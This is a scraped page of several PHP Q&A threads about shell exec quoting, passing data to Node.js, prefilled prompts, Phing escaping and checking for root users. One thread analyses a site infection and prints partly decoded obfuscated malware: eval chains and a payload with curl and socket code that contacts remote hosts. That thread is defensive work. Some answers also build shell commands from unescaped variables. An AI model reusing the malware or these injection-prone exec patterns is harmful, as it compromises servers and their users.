My problem is I set an array value to the name of a server as follow:
$appserver[$i]=`grep $ip[2] /etc/hosts |awk '{print $2}'`;
Later I do a test to see if the server is up or not (using a wget).
If the test fails I keep track of that server being down by creating a file with that
name using touch:
$touch=`touch /home/steve/data/$appserver[$i];
The file gets created successfully.
Later when I go to test whether or not the file exists it never evaluates to true.
if(file_exists('/home/steve/data/$appserver[$i])) {
I have tried several different things including creating a new variable for
$appserver[$i] and testing against it, which also does not work:
I am running php 5.1.6 on RHEL 5.
Here is the full code:
$appserver[$i]=`grep $ip[2] /etc/hosts |awk '{print $2}'`;
echo "appserver[i] = $appserver[$i]\n";
$get=`wget $key->url 2> /dev/null`;
if(file_exists('/home/user/Start')) {
$color[$i]="green";
$rm=`rm -rf /home/user/Start`;
}
else {
$color[$i]="red";
if($hostname=="xxxxx" ) {
**if(file_exists('/home/user/data/$appserver[$i]))** {**
echo "do nothing appserver file exists\n";
$touch=`touch /home/steve/data/notmailed`;
}
else {
echo "No app file mailed alert\n";
$touch=`touch /home/user/data/$appserver[$i]`;
}
}
}
Thank you.
It should be:
if(file_exists("/home/steve/data/$appserver[$i]")) {
if(file_exists('/home/steve/data/$appserver[$i]')) {
' quoted strings do not interpolate variable values, so you're looking for a file whose literal name is $appserver[$i]. Use " quotes instead:
if(file_exists("/home/steve/data/$appserver[$i]")) {
Try this:
$appserver[$i] = "grep $ip[2] /etc/hosts |awk '{print $2}'";
//...
if(file_exists("/home/steve/data/$appserver[$i]"))
{
//...
}
Ensure that you use double-qoutes (") whereever you want the content of variables parsed into the declared string!
Related
I have an application mostly written in PHP, but there is a npm package that has functionality that I need to incorporate into my application. I must pass a string of HTML into the Node.js application but am having issues in getting things correct. I'm using:
exec('node '.$rootPath.'node/app.js '.$imageId.' email '.escapeshellcmd($emailString).' 2>&1', $output, $retVar);
to send the data to my Node.js application, but I'm unsure as to how to decode it once it gets there and needs to be processed via JavaScript. Is there a way to unescape escapeshellcmd() in JavaScript? Or is there a different way I should pass these long strings of HTML over the command-line?
EDIT: Here is the exact method I'm using to pass my info to Node.js:
try{
$emailString = escapeshellcmd($decoded);
//`node $rootPath'node/app.js' $imageId email $emailString 2>&1`;
exec('node '.$rootPath.'node/app.js '.$imageId.' email "'.$emailString.'" 2>&1', $output, $retVar);
print_r($output);
}catch(Exception $e){
echo $e->getMessage()."\n";
}
And here is app.js:
process.argv.forEach(function(value, index, array){
if(index == 2){
id = value;
}
if(index == 3){
type = value;
}
if(index == 4){
visual = value;
}
});
console.log('******* FROM NODE********');
console.log(visual);
It seems like only the first line is getting passed or collected and printed back, and it looks like it's still encoded (unless the console is re-encoding when printing). Also I'm not sure why it seems to be appending values instead of overwriting them:
Array
(
[0] => ******* FROM NODE********
\<head\>\<style type=text/css\>body \{padding:0\; margin:0\; text-align:center\;.tbl1 \{background-color:\#a53f0f\; color:\#fff\; text-align:center\; font-size:\<body data-gramm=true data-gramm_editor=true data-gramm_id=ccdbd45c-b0bf-4691-9\<table border=0 cellpadding=0 cellspacing=0 style=background-color:
)
Array
(
[0] => ******* FROM NODE********
\<head\>\<style type=text/css\>body \{padding:0\; margin:0\; text-align:center\;.tbl1 \{background-color:\#a53f0f\; color:\#fff\; text-align:center\; font-size:\<body data-gramm=true data-gramm_editor=true data-gramm_id=ccdbd45c-b0bf-4691-9\<table border=0 cellpadding=0 cellspacing=0 style=background-color:
[2] => ******* FROM NODE********
\<html xmlns=http://www.w3.org/1999/xhtml xmlns:v=urn:schemas-microsoft-com:vml \<meta name=viewport content=width=device-width,e\>
)
Note: You should use streams over arguments for data to be processed. This is the common way as commands work in the Unix world.
In your code you try to use escapeshellcmd to escape double quote " an encapsulated argument string. This does not work. There is an escapeshellarg PHP function as well. It will encapsulate the string in single quotes ' and escape characters that are even in single quoted strings treated in a special way by the shell.
Assuming $decoded is something like
$decoded = '<body lang="en">very boring message</body>';
then you do not enclose it into quotes yourself. Let escapeshellarg do the trick.
$emailString = escapeshellarg($decoded);
$imageIdString = escapeshellarg($imageId);
exec("node app.js {$imageIdString} email {$emailString} 2>&1", $output, $retVar);
As mentioned above, you really should consider to work on streams instead of arguments. The advantage is that the data can grow to an arbitrary size. Further more proc_open handles STDOUT and STDERR separately. This can be done like that:
try
{
if($handle = proc_open("node app.js {$imageId} email";, [['pipe', 'r'], ['pipe', 'w'], ['pipe', 'w']], $streams))
{
[$stdin, $stdout, $stderr] = $streams;
fwrite($stdin, $decoded);
fclose($stdin);
$output = stream_get_contents($stdout);
fclose($stdout);
$error = stream_get_contents($stderr);
fclose($stderr);
proc_close($handle);
}
echo 'OUTPUT:', PHP_EOL, $output, PHP_EOL;
echo 'ERRORS:', PHP_EOL, $error, PHP_EOL;
}
catch(Exception $e)
{
echo $e->getMessage(), PHP_EOL;
}
Here is an example node.js script handling both, data by arg as well as by stdin:
(() =>
{
'use strict';
console.log('******* FROM NODE********');
const
getStdin = require('get-stdin');
var id, type, visual;
[,, id, type, visual] = process.argv;
// if 4th command line argument is present, use that
if(undefined !== visual)
processData(visual);
// otherwise read data from stdin stream
else
getStdin().then(visual =>
{
processData(visual);
});
function processData(data)
{
console.log('id' , id );
console.log('type', type);
console.log('STDIN:', data);
console.error('no errors');
console.log('******* DONE *******');
}
})();
While Quasimodo's clone's answer does work, his comment on the question made me think about passing the large strings of HTML. I have instead opted to write the html to file and reference with the id.
Is there a PHP functionallity same as read -i in BASH so that a script can prompt the user and provide a default answer like this:
Are you doing ok? (yes/no): yes
Where "yes" is the default answer provided by the script, which the user can erase and input another.
The readline function does not seem to have what it takes. Is there any other way to do this?
Using a stream does not seem to work either:
<?php
echo "Are you doing ok? (yes/no): ";
$in = fopen('php://stdin', 'rw+');
fputs($in, 'yes'); // should be the default?
$answer = fgets($in);
fclose($in);
echo "\nYou entered: {$answer}\n";
Whatever is in written by the fputs($in, 'yes'); line is ignored:
Are you doing ok? (yes/no): yes
You entered:
Am I using the stream incorrectly? Or maybe there is some other way to achive the default value?
EDIT:
Maybe I simlified the example to much. The real issue is not a simple yes/no prompt - this is just an example. Let me emphasize again: I'm aiming for providing exactly the same functionallity as the read -i BASH command. The $answer in my specific case holds an URL, so I would like for the user to be provided with the first part of the url (scheme, host, port), so he can add/edit the rest (path, query), fragment. Like this:
Enter url: http://www.example.com/foo/
now the user complement the path with bar/baz and we get:
You entered: http://www.example.com/foo/bar/baz
But on the other hand the user also should have the option to erase the first part of the url and provide completely different string:
Enter url: ftp://www.my-super-specific-domain.com/foo/bar
There's no built in way of doing this because writing some code that does it is quite straight forward:
function writeQuestion($question, $answers)
{
echo $question . ' (' . implode('/', $answers) . '): ' . PHP_EOL;
}
function readAnswer($possibleAnswers, $defaultAnswer)
{
$in = fopen('php://stdin', 'rw+');
$answer = trim(fgets($in));
if(!in_array($answer, $possibleAnswers))
{
return $defaultAnswer;
}
return $answer;
}
$question = 'Are you doing ok?';
$answers = array('yes', 'no');
$defaultAnswer = 'yes';
writeQuestion($question, $answers);
$answer = readAnswer($answers, $defaultAnswer);
You can wrap standard bash read for prefilled/populated edit and call it from you main php cli script
bash script named xreadline:
#! /bin/bash
IFS="";read -r -p "$1" -i "$2" -e STRING;echo "$STRING"
main php cli script:
#!/usr/bin/php
<?php
function xreadline ($prompt,$prefill)
{
$on = exec ('./xreadline "'.$prompt.'" "'.$prefill.'"');
return $on;
}
$answer = xreadline ('Your answer: ', 'xyz');
echo $answer;
.....
This approach fully supports UTF8 instead of native PHP readline.
Comment messed my code so here is standalone php cli file with function call to "read" command.
Little bit tricky, but hopefully will work as supposed to. :-)
#!/usr/bin/php
<?php
function xreadline ($prompt,$prefill)
{
return exec ('/bin/bash -c \'read -r -p "'.$prompt.'" -i "'.$prefill.'" -e STRING;echo "$STRING";\'');
}
echo "Prompt test :\n";
$output = xreadline ("edit this prefilled prompt: ","prefilled stuff");
echo "\n";
echo $output;
Couple days ago I gave noticed that almost all php files on my server are infected with some encrypted code and in almost every file is different. Here is the example from one of the files:
http://pastebin.com/JtkNya5m
Can anybody tell me what this code do or how to decode it?
You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdonznijh() function with the payloads in the script, this is done by way of an embedded function call in the pre_replace subject the /e in the expression.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
{
return chr(ord($n) - 1);
}
#error_reporting(0);
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the subject of the new preg_replace function. Again due to e it has the potential to execute.
and it is using the callback on array_map to further decode the payload which passed to the eval.
The pay load for eval looks like this (hex decoded):
$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
That is far as I have time for, but if you wanted to continue you may find the following url useful.
http://ddecode.com/
Good luck
I found the same code in a Wordpress instance and wrote a short script to remove it of all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $filename => $cur)
{
$contents = file_get_contents($filename);
if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
echo $filename.PHP_EOL;
file_put_contents($filename, substr($contents, 13280));
}
}
Just change the string 'tngmufxact' to your obfuscated version and everything will be removed automatically.
Maybe the length of the obfuscated string will differ - don't test this in your live environment!
Be sure to backup your files before executing this!
I've decoded this script and it is (except the obfuscation) exactly the same as this one: Magento Website Hacked - encryption code in all php files
The URL's inside are the same too:
33db9538.com
9507c4e8.com
e5b57288.com
54dfa1cb.com
If you are unsure/inexperienced don't try to execute or decode the code yourself, but get professional help.
Besides that: the decoding was done manually by picking the code pieces and partially executing them (inside a virtual machine - just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
In the end you have a few function definitions and one of them gets invoked via ob_start.
This is my command I wish to execute.
php -r "apc_clear_cache(); apc_clear_cache('user'); apc_clear_cache('opcode');"
This is my attempt in phing
<exec command='php -r "apc_clear_cache(); apc_clear_cache(\'user\'); apc_clear_cache(\'opcode\');"' outputProperty="result" />
This is what I get
BUILD FAILED
Error reading project file [wrapped: /var/virtual/abc.com/build.xml:171:26: > required]
Total time: 0.2093 seconds
Please advise.
Update:
I solved my problem by writing a bash script called RunApcClearCache.sh that runs
php -r "apc_clear_cache(); apc_clear_cache('user'); apc_clear_cache('opcode');"
and then calling the bash script using ./RunApcClearCache.sh
If there is a better way, I would like to hear it.
I am also disinclined to write a task just for something so straightforward. Surely there must be a way to escape double quotes properly inside a exectask.
Phing requires valid XML.
In valid XML you cannot use " directly inside an attribute.
You need to escape it / use its equivalent entity.
There are five predefined entities:
< represents "<"
> represents ">"
& represents "&"
' represents '
" represents "
Try using the entities and not the characters.
So use " instead of " inside the command attribute...
https://en.wikipedia.org/wiki/XML#Escaping
Try this:
<exec command="php -r 'apc_clear_cache(); apc_clear_cache(\'user\'); apc_clear_cache(\'opcode\');'" outputProperty="result" />
not sure it works
i would create a new task and excute the php code there.
You can also write a new php file and execute this one with php.
I had the same problem. To avoid shell scripts I defined a adhoc task, which maps the corresponding framework functions, e.g.
<adhoc-task name="fileHelper"><![CDATA[
class FileHelper extends Task {
private $lib = null;
private $task = null;
private $stub = null;
function setTask($task) {
$this->task = $task;
}
function setStub($stub) {
$this->stub = $stub;
}
function setLib($lib) {
$this->lib = $lib;
}
function main() {
$task = $this->task;
$this->$task();
}
function generatePharStub() {
include_once $this->lib . '/FileHelper.php';
HTMLBuilder\FileHelper::generatePharStub($this->stub);
}
function generateIncludes() {
include_once $this->lib . '/FileHelper.php';
HTMLBuilder\FileHelper::generateIncludelist();
}
}
]]></adhoc-task>
Can be called the following way:
<fileHelper lib="${lib}" stub="${stub}" task="generateIncludes" />
In my case ${lib} points to the library directory. ${stub} is the generated phar stub file.
How can i verify if a user is root in a PHP script ? What is the command ?
I tried something like that :
exec("su -l login < `echo password`");
but the su command can not receive password...
Note that the machine is isolated from internet so I can run PHP as root if needed.
EDIT:
I don't want to know if the current user who run the script is root or not.
I have a list of users in my PHP script and I want to know for each login if he has root privileges.
How about posix_getuid()?
if (0 == posix_getuid()) {
echo "Running as root.";
} else {
echo "not root";
}
First, ask yourself what exactly defines a login "having root privileges". AFAICT there are 2 basic solutions.
The old-school way, where sysadmins create multiple accounts with uid 0, which I - and I'm certainly not alone in this - consider to be a nightmare. In this scenario you could check all users in your list using posix_getpwnam and see if their uid matches 0.
The following code snippet does just that, $privileged will contain the users with root privileges :
$logins = array('root', 'john', 'guest', 'foo');
$privileged = array();
foreach($logins as $login) {
$userInfo = posix_getpwnam($login);
if ($userInfo !== FALSE) {
if ($userInfo['uid'] == 0) {
$privileged[] = $login;
}
}
}
The other (and imho only sane) way to do this is to add all users with root/administrative privileges to a specific group (wheel or admin are already used in different Linux distributions, find out which one works for you). This scenario is even simpler, since you can use posix_getgrnam to fetch all members in a specific group.
The following code snippet will match an array of logins you provide, and see who's a member with specific privileges, again $privileged will contain the result (ie. the users in your list that are a member of the group you specified) :
$logins = array('root', 'john', 'guest', 'foo');
$privileged = array();
$groupInfo = posix_getgrnam('admins');
if ($groupInfo !== FALSE) {
$privileged = array_intersect($logins, $groupInfo['members']);
}
Try This .
<?php
if (posix_getuid() == 0){
echo "This is root !";
// add more for root
} else {
echo "This is non-root";
}
?>
If you really mean "is root", then you can just check for whoami, and see if it comes up 'root'
exec("whoami");
If it's a smart thing to do is a different question ;)
Rewritten after your comment
"I don't want to know if the user who
run the script is root or no. I have
to check in a PHP script for some
login/password if they are root or
not"
I now understood that you need to perform a root authentication in PHP.
I suggest to use pwauth instead of whoami/login, etc.
Here is an example on how to use it from PHP, while I believe there can be a simpler way of testing.
If you want to see if a certain system user (as opposed to a web-service user) has root priviliedges, you can use the posix_getpwnam() function:
<?php
$u = posix_getpwnam("username");
if ($u == FALSE) {
print "no-such-user";
} elseif ($u["uid"] == 0) {
print "root";
} else {
print "non-root";
};
?>
Keep in mind that this only checks the username. If you also need to check the password you actually have to try to authenticate with the system.